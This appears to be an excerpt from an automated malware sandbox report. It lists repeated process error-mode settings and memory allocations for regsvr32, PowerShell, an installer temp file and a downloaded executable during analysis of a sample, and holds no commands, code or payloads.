Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\ST.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Memory allocated: 15A017F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Memory allocated: 3600000 memory reserve \| memory write watch
Source: C:\Windows\System32\regsvr32.exe	Memory allocated: 1B830000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\ST.exe	Memory allocated: 20A0000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\ST.exe	Memory allocated: 3BE0000 memory reserve \| memory write watch
